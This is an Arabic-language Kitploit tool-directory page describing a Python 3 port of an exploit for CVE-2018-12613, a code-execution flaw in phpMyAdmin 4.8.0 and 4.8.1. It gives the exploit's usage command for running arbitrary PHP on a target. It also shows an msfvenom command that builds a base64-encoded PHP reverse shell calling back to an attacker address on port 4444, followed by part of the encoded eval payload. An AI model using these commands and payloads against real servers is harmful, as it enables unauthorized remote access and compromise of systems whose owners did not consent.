Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-12613 — استغلال معدّل مستقل تم نقله إلى Python 3 | Kitploit
أدوات/GitHubGitHub/ivanitlearning/cve-2018-12613
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراق
GitHubivanitlearning/cve-2018-12613

CVE-2018-12613

استغلال معدّل مستقل تم نقله إلى Python 3

عرض المستودع
4منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-12613

استغلال معدّل مستقل تم نقله إلى Python 3. تم اختباره على Python 3.7.3، phpMyAdmin 4.8.1 يعمل على Ubuntu 16.04 يعمل على Linux فقط. الاستغلال الأصلي بواسطة SSD. كل الفضل لهم.

التغييرات التي تم إجراؤها

  1. تمت إضافة دالة للخروج إذا كان اسم المستخدم/كلمة المرور المقدمة لـ phpMyAdmin صحيحة
  2. تمت إضافة دالة للتحقق مما إذا كان الإصدار ضعيفًا (4.8.0 أو 4.8.1)
  3. تم تحويل المتغيرات إما إلى بايت أو سلاسل بشكل صارم؛ Python 3 يمنع الخلط. انظر هذا.

الاستخدام:

python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”

نتائج كود php تُخزَّن في results.html

للحصول على شل عكسية

root@kitploit:~
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php

استخدم حمولة msfvenom php بدلاً من phpcredits(); أعلاه

root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php

eval(base64_decode(ICAg...gfQo));

تنزيل الأداة